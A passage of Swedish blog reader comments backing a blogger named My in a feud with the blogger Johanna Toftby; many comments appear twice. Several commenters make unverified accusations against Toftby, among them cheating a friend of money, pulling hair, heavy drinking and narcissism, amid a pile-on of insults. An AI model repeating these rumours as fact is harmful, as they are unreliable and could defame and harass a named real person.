 62. Kan inte mer än bara hålla med! Tycker att hon verkar vara en dryg otrevlig tjej! De gånger man skrivit på hennes insta är det bara otrevliga arroganta svar tillbaka! Hon är nog som hon spelar i reklaman… Ego! (Killen som springer in i rutan och det blir en fläck där hon just tvättat).

  Du är duktig, fortsätt så <3

 63. Smart, modig, snygg som f-n, driven, duktig och ödjmjuk och snäll! Det ÄR DU MY!!! Jag står ALLTID bakom dig! Du är BÄST! Du kommer gå så jäkla långt! Och det är du så väl värd!!!! Puss min vän

 64. Jag kan inte smälta mobbingen du beskriver, att hon dels har frusit ut dig men också fysiskt har tagit tag i ditt hår och kränkt dig verbalt, det är så illa. Bra att du berättar, ingen ska behöva bli behandlad på detta sätt, hon har ingen rätt att göra som hon har gjort mot dig.

  • Håller med dig. Jag kan inte heller släppa det. Hur fasen är man funtad om man gör så. Tar tag i någons hår och säger på det viset. Fy vuxna människa.

 65. Helt chockad!!! Följer er båda o tycker ni bägge verkar härliga! Inte ens tänkt tanken att nått du gör skulle va för att kopiera Johanna så fattar inte vad folk får det ifrån! Vet inte vad jag ska tycka om Johanna! Men nått jag stört mig på är när Johanna är på nått så är det såååååå grymt nästan lite överdrivet! Sen har jag funderat på varför man inte ser nått med Loveforever längre o varför hon inte umgås med hon Therese från Loveforever, va ju så mycket förr, nån mer som reagerat på det?

  • Det kan jag berätta! Hon blåste Therece på pengar. Betedde sig riktigt illa och bara drog när räkningen kom. Tyvärr har jag hört om detta beteende innan när det gäller henne. Fler vänner än Therece har blivit lurade.

 66. Mkt bra skrivet modigt och ärligt . Du bekräftar min känsla jag har haft för denna kvinna som sagt What goes around comes around karma ! Har avföljt henne igår kväll efter att ha läst ditt inlägg . Du verkar vara en ärlig jordnära person med ett gott hjärta som jobbar hårt i din vardag såg dig på EMS när du var med där och gillade dig och har följt dig på Instgram och läst din blogg ett tag . Gillar att du skriver ärligt och du inspirerar . Önskar dig all lycka och allt gott ! kram ❤️

 67. Hej My, jag förstår hur du tänker men jag undrar ändå varför du väljer att ta upp detta i ett blogginlägg där enbart dina åsikter och uppfattningar får plats? Jag vet att du kämpar hårt för ett bättre bloggklimat och detta gör väl inte det bättre? Nu kastar du ju faktiskt bensin på elden! Lite dubbelmoral? Vore det inte bättre att ta detta med henne personligen?

  • Jag måste försvara My. Hur mycket skitsnack och otrevliga kommentarer ska man behöva ta innan man får ryta ifrån? Att prata med JT verkar ju uppenbarligen inte lönt och ska hon då bara godta andra människors elaka kommentarer och inte få försvara sig?

 68. O varför gör hon inget med Michaela.c i Borås längre? Jag har för mig ang bilden med Loveforever att hon skrev att du fick låna den men att hon hade hört att andra utan tillstånd använde den??

 69. Vill bara säga att du är en helt fantastisk person. Har gillat dig sen första gången vi sågs. Du är en person att se upp till som gjort ett fantastiskt jobb på sååå många plan. Nu har jag dessutom lärt känna dig närmare och har den stora äran att få hänga ibland.
  DU är en fin människa My och jag gillar dig massor!
  Stor kram ♥♥♥

 70. My du är en så jordnära,ärlig och duktig tjej. Jag tycker så mycket om dig. Det är en hel del människor som denna personen har tagit energi från. Man blir så fruktansvärt ledsen och besviken. Många kramar Monalisa Love Forever

 71. Hej My, har inte så bra koll på vad detta handlar om men funderar lite. Hade jag sett ett sådant här inlägg om mig själv där man inte får chansen att motargumentera så hade jag nog anmält. Känns inte rätt att du försöker förespråka att vi kvinnor ska hjälpa varandra samtidigt som du hänger ut en person på detta sätt. Inte bra alls!

  • Hon har väl samma chans att motargumentera precis som du gör nu om hon läser bloggen? Det är ju inte direkt hemligstämplat =)
   Jag tycker det är bra att My säger ifrån och försvarar sig. Man ska verkligen inte behöva ta skit i oändlighet och låta andra spy galla över en för att någon sprider falska rykten om en. Kan inte vara kul att läsa elaka kommentarer om att man ”härmar” någon annan ständigt och jämt.
   Och visst måste man kunna förespråka att stå upp för varandra och samtidigt få stå upp för sig själv. Tycker du inte det? =)

 72. Brukar aldrig kommentera men denna gången känner jag att jag måste. Det du säger stämmer precis in på bilden jag fått av henne ifrån hennes blogg och insta. Tänk att det kan lysa igenom så tydligt. Bra att du säger ifrån, ni är så långt ifrån varandra som man kan komma. Att någon ens tänker tanken att du skulle kopiera henne är för mig helt otroligt. Massa kramar fina du

 73. Hej!
  Fast nu tycker jag det nästan låter som du, även dina läsare, gör likadant ? …
  Jag dömer ingen! Har aldrig gjort, alla gör vad de själva vill. Men som i alla sammanhang finns det 2 sidor av myntet …
  Tycker ni kämpar på alla ni som bloggar om träning och hälsa! Fortsätt med det! Det behövs.
  Kram <3

  • nej, inte riktigt! Johanna har kränkt överviktiga på sin blogg flera gånger! jag har kommenterat detta på hennes blogg och fått otrevliga svar.

 74. Hej älskling. har du tänkt på att hon börjar bli till åren hon vill ha det hon hade men de är intresserade av fräschör, ärlig utstrålning och få behållning i ex. bilder. Jag vet när hon sårat dig, men det gör bara henne till en liten människa. Det vill säga allt annat än du är. Om du bara härmade henne varför skulle någon vara intresserad. Kan vara svårt att ta att man inte längre är intressant. Så bra att de äntligen får veta hur denna människa har behandlat dig. Massor av kramar.

 75. Vi alla får tycka vad vi vill om vissa personer och vi alla gör så klart. Vi råkar ut för elaka ord, påhopp, vi känner oss utfrysta, vissa se oss bara på ytan mm.
  Jag vet också att du har all rätt att bli arg men gillar däremot inte när det blir någon slags masshat på någon person på ett offentligt sätt.
  Din blog, dina reflektioner och tankar men att sedan alla skall föjare & läsare bara hetsa detta ännu mer gör mig faktiskt illa till mods för är vi själva bättre då?
  Tänk på att det finns barn och ungdomar som drabbas också genom att detta starka ogillande görs offentligt, delas och sprids. Sådant står jag inte bakom men förstår däremot din känsla om att ”säga ditt” i det hela <3 Ibland vill vi alla visa det där fingret till någon eller omvärlden … Kram <3

 76. Jag kan inte smälta mobbingen du beskriver, att hon dels har frusit ut dig men också fysiskt har tagit tag i ditt hår och kränkt dig verbalt, det är så illa. Bra att du berättar, ingen ska behöva bli behandlad på detta sätt, hon har ingen rätt att göra som hon har gjort mot dig.

  • Håller med dig. Jag kan inte heller släppa det. Hur fasen är man funtad om man gör så. Tar tag i någons hår och säger på det viset. Fy vuxna människa.

 77. Mkt bra skrivet modigt och ärligt . Du bekräftar min känsla jag har haft för denna kvinna som sagt What goes around comes around karma ! Har avföljt henne igår kväll efter att ha läst ditt inlägg . Du verkar vara en ärlig jordnära person med ett gott hjärta som jobbar hårt i din vardag såg dig på EMS när du var med där och gillade dig och har följt dig på Instgram och läst din blogg ett tag . Gillar att du skriver ärligt och du inspirerar . Önskar dig all lycka och allt gott ! kram ❤️

 78. Vill bara säga att du är en helt fantastisk person. Har gillat dig sen första gången vi sågs. Du är en person att se upp till som gjort ett fantastiskt jobb på sååå många plan. Nu har jag dessutom lärt känna dig närmare och har den stora äran att få hänga ibland.

  DU är en fin människa My och jag gillar dig massor!

  Stor kram ♥♥♥

 79. My du är en så jordnära,ärlig och duktig tjej. Jag tycker så mycket om dig. Det är en hel del människor som denna personen har tagit energi från. Man blir så fruktansvärt ledsen och besviken. Många kramar Monalisa Love Forever

 80. Hej
  Jag vet tyvärr inte vem du är och jag har inte heller inte sett dig nämnas på Johannas blogg. Men vilka hemska kommentarer man läser här och det känns som att det är det som var meningen inlägget. Jag vet ju inte vad som hänt mellan dig och Johanna och det tror jag inte så många andra här vet heller. Blir därför förvånad över hur lätt alla hetsas till att hata. Tycker att det som skrivs om Johanna, hur hon behandlar andra, det är ju precis så många beter sig själva i sina kommentarer. Vad är i så fall skillnaden?
  Ja ja som sagt jag vet inte historien mellan dig och Johanna, tycker bara detta är onödigt. Den Johanna som framställs här är inte den Johanna jag känner…

 81. Hej!

  Fast nu tycker jag det nästan låter som du, även dina läsare, gör likadant 😮 …
  Jag dömer ingen! Har aldrig gjort, alla gör vad de själva vill. Men som i alla sammanhang finns det 2 sidor av myntet …

  Tycker ni kämpar på alla ni som bloggar om träning och hälsa! Fortsätt med det! Det behövs.

  Kram <3

  • nej, inte riktigt! Johanna har kränkt överviktiga på sin blogg flera gånger! jag har kommenterat detta på hennes blogg och fått otrevliga svar.

 82. Hej älskling. har du tänkt på att hon börjar bli till åren hon vill ha det hon hade men de är intresserade av fräschör, ärlig utstrålning och få behållning i ex. bilder. Jag vet när hon sårat dig, men det gör bara henne till en liten människa. Det vill säga allt annat än du är. Om du bara härmade henne varför skulle någon vara intresserad. Kan vara svårt att ta att man inte längre är intressant. Så bra att de äntligen får veta hur denna människa har behandlat dig. Massor av kramar.

 83. Vi alla får tycka vad vi vill om vissa personer och vi alla gör så klart. Vi råkar ut för elaka ord, påhopp, vi känner oss utfrysta, vissa se oss bara på ytan mm.
  Jag vet också att du har all rätt att bli arg men gillar däremot inte när det blir någon slags masshat på någon person på ett offentligt sätt.
  Din blog, dina reflektioner och tankar men att sedan alla skall föjare & läsare bara hetsa detta ännu mer gör mig faktiskt illa till mods för är vi själva bättre då?
  Tänk på att det finns barn och ungdomar som drabbas också genom att detta starka ogillande görs offentligt, delas och sprids. Sådant står jag inte bakom men förstår däremot din känsla om att ”säga ditt” i det hela <3 Ibland vill vi alla visa det där fingret till någon eller omvärlden … Kram <3

 84. Wow vilken respons du har fått! Jag håller med dom flesta här. Jag blir paff då jag inte förstått vem den här kvinnan är. Har följt henne lite lätt på blogg och insta. men inte alls förstått att hon är så arogant och allt. Men det är klart, sånt ser man väl inte via bloggen kanske? hur som helst, självklart ska du få göra vad du vill. Tack för att du är en person som vågar stå upp för dig själv, för vem du är, för vad du tycker och hur du tänker. Vet inte om du minns vårta mailkonversationer ang näthat? Men det är precis sånt här, personer som du, som stärker mig och min tro i att stå på mig själv och kämpa emot och aldrig, aldrig ge upp.
  Vad synd och vad tråkigt att hatet aldrig kommer att gå stoppa, men kanske man kan bli så stark att man bara ignorerar. Stå på dig finaste du, du verkar vara en människa med fötterna på jorden, så fin, så jordnära och så vacker inombords såväl som utanpå!
  Hoppas vi ses någon dag på nått event fina du.
  Stor kram !! <3

 85. Så modigt gjort av dig My. Man ska inte ta skit. Vad jag förstår har du varit tyst väldigt länge. Flera med dig har varit tysta. Det är inte ok. Jag vill inte läsa någons blogg, handla av någon eller ge henne cred hon inte ska ha. Tack My för din ärlighet. Nu kan jag göra ett bra val.
  Sen en sak till. Såg att Janne skrivit på din Insta. Han ska nog läsa ditt inlägg en gång till. Missade han allt om mobbning, utfrysning och att hon fysiskt tagit i ditt hår. Det är vidrigt. Suck.
  Kram

 86. Jag känner dig inte My men jag gillar din personlighet genom din blogg! Du verkar ödmjuk men samtidigt väldigt målmedveten. Din ödmjukhet lyser igenom i all du gör My. Ödmjukhet i en framgångsrik business som du har är en väldigt underskattad men otroligt fin egenskap! Du kommer gå långt! Inte nog med det, du vågar stå upp för dig själv, men samtidigt försöker du parera de elakheter som passerar tills det går för långt som nu.
  Jag har tyvärr genom min egen business erfarit den oproffsighet som Johanna står för när hon var ”ansiktet utåt” för Love Forever tidigare. Jag är säker på att Love Forever med Terece A vunnit väldigt mycket på att ha dig och de andra fina tjejerna som representanter för sitt fina varumärke!
  En sak som de allra flesta av oss företagare förstår det är att vi alla måste ta konsekvenserna av vårt eget handlande!
  You go girl! Jag gillar dig skarpt, det jag sett av dig!
  //Berith, Pretty Home Interior Design

 87. Äntligen säger jag med,man får ALDRIG ha en åsikt då bombar hon en med fula ord etc,så jäkla bra folk får höra sanningen,hon vill sååå gärna umgås med ”kändisarna” och därav blev du som sagt medbjuden när HG är din vän.
  Som sagt jag håller med de flesta här,äntligen stämmer det man tyckt.
  Stå på dig.

  • hihi känner igen det där, sthlm är inte stort och en del av mina bekanta är på samma tillställningar osv med henne, ingen trevlig person ibland..svartsjuk också;-)

 88. Hej
  Jag vet tyvärr inte vem du är och jag har inte heller inte sett dig nämnas på Johannas blogg. Men vilka hemska kommentarer man läser här och det känns som att det är det som var meningen inlägget. Jag vet ju inte vad som hänt mellan dig och Johanna och det tror jag inte så många andra här vet heller. Blir därför förvånad över hur lätt alla hetsas till att hata. Tycker att det som skrivs om Johanna, hur hon behandlar andra, det är ju precis så många beter sig själva i sina kommentarer. Vad är i så fall skillnaden?
  Ja ja som sagt jag vet inte historien mellan dig och Johanna, tycker bara detta är onödigt. Den Johanna som framställs här är inte den Johanna jag känner…

 89. Wohhhhooooo….hejja My!!!
  Låt ingen sätta sig på dig…speciellt inte en sån tragisk person som Johanna, och är inte värd det!
  GO GIRL!!! <3

 90. Wow vilken respons du har fått! Jag håller med dom flesta här. Jag blir paff då jag inte förstått vem den här kvinnan är. Har följt henne lite lätt på blogg och insta. men inte alls förstått att hon är så arogant och allt. Men det är klart, sånt ser man väl inte via bloggen kanske? hur som helst, självklart ska du få göra vad du vill. Tack för att du är en person som vågar stå upp för dig själv, för vem du är, för vad du tycker och hur du tänker. Vet inte om du minns vårta mailkonversationer ang näthat? Men det är precis sånt här, personer som du, som stärker mig och min tro i att stå på mig själv och kämpa emot och aldrig, aldrig ge upp.

  Vad synd och vad tråkigt att hatet aldrig kommer att gå stoppa, men kanske man kan bli så stark att man bara ignorerar. Stå på dig finaste du, du verkar vara en människa med fötterna på jorden, så fin, så jordnära och så vacker inombords såväl som utanpå!
  Hoppas vi ses någon dag på nått event fina du.
  Stor kram !! <3

 91. Måntro det kan finnas en liten chans till att ditt instagram-foto som sätts ut emellanåt och har en ”ful” text mm, har nånting med denna damen att göra…bara för att förstöra för dej..

 92. Så modigt gjort av dig My. Man ska inte ta skit. Vad jag förstår har du varit tyst väldigt länge. Flera med dig har varit tysta. Det är inte ok. Jag vill inte läsa någons blogg, handla av någon eller ge henne cred hon inte ska ha. Tack My för din ärlighet. Nu kan jag göra ett bra val.
  Sen en sak till. Såg att Janne skrivit på din Insta. Han ska nog läsa ditt inlägg en gång till. Missade han allt om mobbning, utfrysning och att hon fysiskt tagit i ditt hår. Det är vidrigt. Suck.
  Kram

 93. Jag känner dig inte My men jag gillar din personlighet genom din blogg! Du verkar ödmjuk men samtidigt väldigt målmedveten. Din ödmjukhet lyser igenom i all du gör My. Ödmjukhet i en framgångsrik business som du har är en väldigt underskattad men otroligt fin egenskap! Du kommer gå långt! Inte nog med det, du vågar stå upp för dig själv, men samtidigt försöker du parera de elakheter som passerar tills det går för långt som nu.

  Jag har tyvärr genom min egen business erfarit den oproffsighet som Johanna står för när hon var ”ansiktet utåt” för Love Forever tidigare. Jag är säker på att Love Forever med Terece A vunnit väldigt mycket på att ha dig och de andra fina tjejerna som representanter för sitt fina varumärke!
  En sak som de allra flesta av oss företagare förstår det är att vi alla måste ta konsekvenserna av vårt eget handlande!

  You go girl! Jag gillar dig skarpt, det jag sett av dig!
  //Berith, Pretty Home Interior Design

 94. Äntligen säger jag med,man får ALDRIG ha en åsikt då bombar hon en med fula ord etc,så jäkla bra folk får höra sanningen,hon vill sååå gärna umgås med ”kändisarna” och därav blev du som sagt medbjuden när HG är din vän.
  Som sagt jag håller med de flesta här,äntligen stämmer det man tyckt.
  Stå på dig.

  • hihi känner igen det där, sthlm är inte stort och en del av mina bekanta är på samma tillställningar osv med henne, ingen trevlig person ibland..svartsjuk också;-)

 95. Wohhhhooooo….hejja My!!!
  Låt ingen sätta sig på dig…speciellt inte en sån tragisk person som Johanna, och är inte värd det!
  GO GIRL!!! <3

 96. Äntligen! Äntligen kommer saker fram som min känsla sagt mej hela tiden sedan denna Toftby fick luft och var med i tv3. Tack My! Och stå på dej, du är grym!

 97. Måntro det kan finnas en liten chans till att ditt instagram-foto som sätts ut emellanåt och har en ”ful” text mm, har nånting med denna damen att göra…bara för att förstöra för dej..

 98. Om människor sårar
  dig om och om igen,
  tänk då på dem
  som sandpapper.
  De river ditt hjärta
  och skadar dig
  men till slut har du blivit
  polerad och ren
  medan de har blivit
  Värdelösa

 99. Äntligen! Äntligen kommer saker fram som min känsla sagt mej hela tiden sedan denna Toftby fick luft och var med i tv3. Tack My! Och stå på dej, du är grym!

 100. Hej My! Vilken fantastiskt snygg klänning du har på dig, den i spets med långa ärmar. Snälla, tala om var den kommer från för jag måste ha den.
  Hälsningar Annica

 101. Tack My för att du säger det som så många tänker men inte orkar ta i. Johanna är genuint underlig och skulle aldrig göra eller säga någonting utan att ha en baktanke om personlig vinning. Det funkar ju ett tag men som du säger – Karma och bubblan spricker.
  För mycket alkohol, narcissism, åldersfixering och träningsmani är absolut ingen bra kombo. Hon kanske är bra på att klippa in löshår och vaxa ben, då tycker jag att hon ska hålla sig till det och låta oss andra leva livet på riktigt.

 102. Jag har skrivit förut och sagt att jag tycker du gör ett strålande jobb med barn och flera företag. Bodde jag i dina trakter så hade jag besökt Mys blommor jämnt för inköp och inspiration. Det kan upprepas igen!
  Jag har kommenterat/frågat en sak om hårvård hos Johanna någon gång men aldrig fått nåt svar. Det verkar vara mycket businnes nu sedan Janne kom in i bilden, de samarbeten hon haft har övergått till att ta upp det i egen regi så slipper man ”krångliga” partners.
  Men skit i det nu och kör ditt race, you go girl!!

 103. Om människor sårar
  dig om och om igen,
  tänk då på dem
  som sandpapper.
  De river ditt hjärta
  och skadar dig
  men till slut har du blivit
  polerad och ren
  medan de har blivit
  Värdelösa

 104. BRA sagt My, man ska inte stå ut med för mycket!! ?
  Du gör helt rätt i att säga din ståndpunkt, läste hennes, Toftbys blogg förut men slutade rätt snart då hon bara verkade vilja stå i rampljuset verkade väldigt kändisk*t eller vad man nu ska säga. Inte i min smak att läsa. Om man måste klampa ner på någon varför slutar man bara inte att följa den personen som ittiterar en så mycket??..
  Du däremot har fångat mig till att läsa din blogg!! Har min mamma på Öland så det känns lite som hemma när jag läser din blogg!! ?
  Stå upp för dig och ta inte skit från någon, du är värd så mycket mer än så!!
  Kram eva

 105. Hej My! Vilken fantastiskt snygg klänning du har på dig, den i spets med långa ärmar. Snälla, tala om var den kommer från för jag måste ha den.

  Hälsningar Annica

 106. Tack My för att du säger det som så många tänker men inte orkar ta i. Johanna är genuint underlig och skulle aldrig göra eller säga någonting utan att ha en baktanke om personlig vinning. Det funkar ju ett tag men som du säger – Karma och bubblan spricker.

  För mycket alkohol, narcissism, åldersfixering och träningsmani är absolut ingen bra kombo. Hon kanske är bra på att klippa in löshår och vaxa ben, då tycker jag att hon ska hålla sig till det och låta oss andra leva livet på riktigt.

 107. Tack My för att du äntligen stod upp!
  Hon skriker :SE på meeeej, hela kvinnan!
  Heja dej!
  Fortsätt vara du det är så bra som du är❤️

 108. Jag har skrivit förut och sagt att jag tycker du gör ett strålande jobb med barn och flera företag. Bodde jag i dina trakter så hade jag besökt Mys blommor jämnt för inköp och inspiration. Det kan upprepas igen!

  Jag har kommenterat/frågat en sak om hårvård hos Johanna någon gång men aldrig fått nåt svar. Det verkar vara mycket businnes nu sedan Janne kom in i bilden, de samarbeten hon haft har övergått till att ta upp det i egen regi så slipper man ”krångliga” partners.

  Men skit i det nu och kör ditt race, you go girl!!

 109. Johanna är så mediakåt , o någon vidare frisör
  Är hon då rakt inte…Kan jag uppriktigt säga som jobbat
  Som frisör i 30 år…
  Tänk så Karma its a bitch ..

 110. Helt rätt av dig My – använd set forum du har för att bemöta ”public hanging” sem den Kvinnan utsatt dig för. Vem skriver i te om hälsa träning eller ide idag? Nä lägg din energi och fokus där den hör hemma ignorans är bästa försvar . Sen skrattade jag riktigt bra åt hennes hashtag om inga genvägar… När hon öppet erkänner botox .. Inte så smart den tjejen! My, do your thing !!

 111. BRA sagt My, man ska inte stå ut med för mycket!! 😀
  Du gör helt rätt i att säga din ståndpunkt, läste hennes, Toftbys blogg förut men slutade rätt snart då hon bara verkade vilja stå i rampljuset verkade väldigt kändisk*t eller vad man nu ska säga. Inte i min smak att läsa. Om man måste klampa ner på någon varför slutar man bara inte att följa den personen som ittiterar en så mycket??..

  Du däremot har fångat mig till att läsa din blogg!! Har min mamma på Öland så det känns lite som hemma när jag läser din blogg!! 😀
  Stå upp för dig och ta inte skit från någon, du är värd så mycket mer än så!!
  Kram eva

 112. Läser normalt sätt inte Bloggar. Men ditt inlägg som delats på FB fångade något hos mig. Skrollar snabbt igenom din sida. Du känns som en varm och trevlig person. Skrollar igenom Toftbys och får en helt annan känsla… Omoget och löjligt beteende från en vuxen människa. Copy-cat?? Det finns väl så j@^la mycket bloggare om träning, hälsa, mamma mm att det är väl omöjligt att folk inte skriver om samma saker emellanåt??
  Ta ingen skit! =)

 113. Vill verkligen tacka dig för att du säger ifrån. Det är många av oss som bara sväljer och sväljer och samlar allt inom oss.
  Du inspekterar och påminde mig om hur viktigt det är att inte ta någon skit!
  Det som gör mig upprörd förutom det hon gjort dig är att hon är mamma till två flickor.
  Två tonårsflickor som får växa upp med en sån här förebild..det känns så sorgligt.
  Tack igen My för att du öppnade dig, jag ska själv sträcka på mig och säga ifrån mer och framförallt stå upp mer för mig själv.
  Kram!

 114. Tack My för att du äntligen stod upp!
  Hon skriker :SE på meeeej, hela kvinnan!
  Heja dej!
  Fortsätt vara du det är så bra som du är❤️

 115. Johanna är så mediakåt , o någon vidare frisör
  Är hon då rakt inte…Kan jag uppriktigt säga som jobbat
  Som frisör i 30 år…
  Tänk så Karma its a bitch ..

 116. Helt rätt av dig My – använd set forum du har för att bemöta ”public hanging” sem den Kvinnan utsatt dig för. Vem skriver i te om hälsa träning eller ide idag? Nä lägg din energi och fokus där den hör hemma ignorans är bästa försvar . Sen skrattade jag riktigt bra åt hennes hashtag om inga genvägar… När hon öppet erkänner botox .. Inte så smart den tjejen! My, do your thing !!

 117. Jag tycker du är modig som vågar skriva om vad du upplevt. Tror att vissa människor ibland behöver få sig en tankeställare. Gillar din blogg mycket ♥

 118. Läser normalt sätt inte Bloggar. Men ditt inlägg som delats på FB fångade något hos mig. Skrollar snabbt igenom din sida. Du känns som en varm och trevlig person. Skrollar igenom Toftbys och får en helt annan känsla… Omoget och löjligt beteende från en vuxen människa. Copy-cat?? Det finns väl så j@^la mycket bloggare om träning, hälsa, mamma mm att det är väl omöjligt att folk inte skriver om samma saker emellanåt??
  Ta ingen skit! =)

 119. Vill verkligen tacka dig för att du säger ifrån. Det är många av oss som bara sväljer och sväljer och samlar allt inom oss.
  Du inspekterar och påminde mig om hur viktigt det är att inte ta någon skit!
  Det som gör mig upprörd förutom det hon gjort dig är att hon är mamma till två flickor.
  Två tonårsflickor som får växa upp med en sån här förebild..det känns så sorgligt.
  Tack igen My för att du öppnade dig, jag ska själv sträcka på mig och säga ifrån mer och framförallt stå upp mer för mig själv.
  Kram!

 120. Fortsätt att vara denna härliga person du är….mer båda fötterna på jorden.Du är så ödmjuk och härlig….håll huvudet högt och ta inte åt dig av att Johanna inte mår bra som msk…det finns gott om olycklig personer som mår bra av att suga energi av oskyldiga msk som försöker att vara den ….msk alla vill ha som vän och egentligen den man själv vill vara!

 121. Jag tycker du är modig som vågar skriva om vad du upplevt. Tror att vissa människor ibland behöver få sig en tankeställare. Gillar din blogg mycket ♥

 122. Fortsätt att vara denna härliga person du är….mer båda fötterna på jorden.Du är så ödmjuk och härlig….håll huvudet högt och ta inte åt dig av att Johanna inte mår bra som msk…det finns gott om olycklig personer som mår bra av att suga energi av oskyldiga msk som försöker att vara den ….msk alla vill ha som vän och egentligen den man själv vill vara!

 123. Hej My,
  Vill bara säga att det är lätt för människor som läser detta att tänka att ”hon kanske är likadan själv”. Men, jag vet att det inte är så. Jag bodde i Kalmar fram tills april i år och mötte dig flera gånger på fik, under löprundor och så vidare, och du sökte alltid blick för att få ge ett leende. Man kan fjäska till höger och vänster, spegla sig i andras glans, men att du alltid gav ett leende säger allt om dig. Där har du grunden för att vara en sund och härlig medmänniska! Du är ÄKTA. Där är skillnaden på dig och Toftby. Numera bor jag i Vasastan, Sthlm, gillar det lika mkt som dig! Ta hand om dig!

 124. Hej My,
  vad roligt att du skriver just detta..Jag bor och jobbar I sthlm. Har rätt många vänner och ytliga bekanta. Några umgås I samma kretsar som Fröken Johanna… Många gånger har jag hört precis samma saker som du beskriver, spydig, arrogant och extremt svartsjuk på Janne..
  Kändispilsk med andra ord…är man något så vill hon hälsa och dra fördel.
  Kram på dig och såååååå bra att du skrev detta inlägg.
  Jag har kommenterat ifrågasatt på hennes instagram, kanske insåg hon att vi hade gemensamma bekanta och vänner…så jag blev blockad;-) hihihi kram på dig och jag gör tummen upp för ditt inlägg:-)

 125. Karma is a bitch! Fortsätt med din positiva inställning till alla i din omgivning. Verkligheten kommer som ett hårt slag i ansiktet till de som vill göra livet surt för andra.
  Keep up the good work! Kram

 126. Hej My!
  Jag gick frisörskolan när toftby hoppade in i min klass o gick komvuxvarianten i två år. Slutade i juni 08 o en månad senare va hon med i ems o satt i tv o sa saker som
  ”Åh mitt ’gamla’ dockhuvud från frisörskolan”
  Som hon satt o slet med i skolan bara 4veckor tidigare.! Den mest osäkra person jag mött, både personligen o inom yrket! o satt i skolan o sökte ALLA dokusåpor som fanns för de enda viktiga i livet va att bli KÄNDIS!
  Vet ingen som ser henne som god på hemorten, för jag har aldrig hört ett gott ord!
  Sen kan du ju bara googla den grymma frisören som klagar på folks hår o se hur den grymma frisörens eget löshår sett ut genom tiderna!
  You go girl!!!

 127. Hej My,

  Vill bara säga att det är lätt för människor som läser detta att tänka att ”hon kanske är likadan själv”. Men, jag vet att det inte är så. Jag bodde i Kalmar fram tills april i år och mötte dig flera gånger på fik, under löprundor och så vidare, och du sökte alltid blick för att få ge ett leende. Man kan fjäska till höger och vänster, spegla sig i andras glans, men att du alltid gav ett leende säger allt om dig. Där har du grunden för att vara en sund och härlig medmänniska! Du är ÄKTA. Där är skillnaden på dig och Toftby. Numera bor jag i Vasastan, Sthlm, gillar det lika mkt som dig! Ta hand om dig!

 128. Hon blockar varenda kommentar jag skriver, ändå säjer hon att hon har ett öppet kommentarsfält. Känner inte någon av er, men du verkar vara underbar. Nu slutar jag att läsa Johannas blogg Stor kram

 129. Hej My,

  vad roligt att du skriver just detta..Jag bor och jobbar I sthlm. Har rätt många vänner och ytliga bekanta. Några umgås I samma kretsar som Fröken Johanna… Många gånger har jag hört precis samma saker som du beskriver, spydig, arrogant och extremt svartsjuk på Janne..

  Kändispilsk med andra ord…är man något så vill hon hälsa och dra fördel.

  Kram på dig och såååååå bra att du skrev detta inlägg.
  Jag har kommenterat ifrågasatt på hennes instagram, kanske insåg hon att vi hade gemensamma bekanta och vänner…så jag blev blockad;-) hihihi kram på dig och jag gör tummen upp för ditt inlägg:-)

 130. Karma is a bitch! Fortsätt med din positiva inställning till alla i din omgivning. Verkligheten kommer som ett hårt slag i ansiktet till de som vill göra livet surt för andra.
  Keep up the good work! Kram

 131. Hej My!

  Jag gick frisörskolan när toftby hoppade in i min klass o gick komvuxvarianten i två år. Slutade i juni 08 o en månad senare va hon med i ems o satt i tv o sa saker som
  ”Åh mitt ’gamla’ dockhuvud från frisörskolan”
  Som hon satt o slet med i skolan bara 4veckor tidigare.! Den mest osäkra person jag mött, både personligen o inom yrket! o satt i skolan o sökte ALLA dokusåpor som fanns för de enda viktiga i livet va att bli KÄNDIS!

  Vet ingen som ser henne som god på hemorten, för jag har aldrig hört ett gott ord!

  Sen kan du ju bara googla den grymma frisören som klagar på folks hår o se hur den grymma frisörens eget löshår sett ut genom tiderna!

  You go girl!!!

 132. Hon blockar varenda kommentar jag skriver, ändå säjer hon att hon har ett öppet kommentarsfält. Känner inte någon av er, men du verkar vara underbar. Nu slutar jag att läsa Johannas blogg Stor kram

 133. Kära fina My ~ Backar dig till 100%
  Du är fantastisk & det kommer bara gå bättre & bättre för dig i livet. Så ta för dig & njut av allt du kämpar för varje dag. Jag är en av dom vännerna som finns här för dig & skriver under på din ärlighet.
  Glöm aldrig bort att du är värdefull!
  Många varma styrkekramar till dig, från mig.
  Anna Toledano~Book.

 134. Så bra gjort av dig, att du sagt ifrån. Håller med dig om allt. Toftby vill bara synas i media, tycker hennes blogg är sikt. Hon är den mest självupptagna person som finns. Jag läser din blogg, Magdalena och Hanna Graafs blogg och Pernilla Wahlgrens blogg. Ni bjuder verkligen på er själva. Kram

 135. Kära fina My ~ Backar dig till 100%
  Du är fantastisk & det kommer bara gå bättre & bättre för dig i livet. Så ta för dig & njut av allt du kämpar för varje dag. Jag är en av dom vännerna som finns här för dig & skriver under på din ärlighet.
  Glöm aldrig bort att du är värdefull!
  Många varma styrkekramar till dig, från mig.

  Anna Toledano~Book.

 136. Ja jag slutade följa Johannas Blogg för länge sedan, känner att hon är så himlens ytlig och att precis allt ska cirkulera runt henne, hon gjorde något Bloggreportage från Barcelona där hon bombarderade bloggen med hundratals foton på sig själv, jag skrev lite olika tips på ställen att besöka då jag är gift med en spanjor och har varit i Barcelona massor av gånger men upptäckte då att jag inte längre kunde skriva i hennes blogg, efter det tog jag bort hennes blogg och fb sida , det kanske blev obekvämt med någon annan som hade tips och ideer?? har faktiskt inte varit med om det förut, men som sagt när jag läser ditt inlägg så förstår jag att jag hade lite rätt i mina aningar om att hon vill regera ensam i media osv. ? bra My !! <3

 137. Jag har aldrig läst Johannas blogg så jag har ingen uppfattning om henne. Däremot har jag följt din blogg i några månader och du verkar vara en mysig och snäll tjej som vet vad du vill. Ignorera Johanna och låt inte henne och hennes anhang stjäla din energi.

 138. Så bra gjort av dig, att du sagt ifrån. Håller med dig om allt. Toftby vill bara synas i media, tycker hennes blogg är sikt. Hon är den mest självupptagna person som finns. Jag läser din blogg, Magdalena och Hanna Graafs blogg och Pernilla Wahlgrens blogg. Ni bjuder verkligen på er själva. Kram

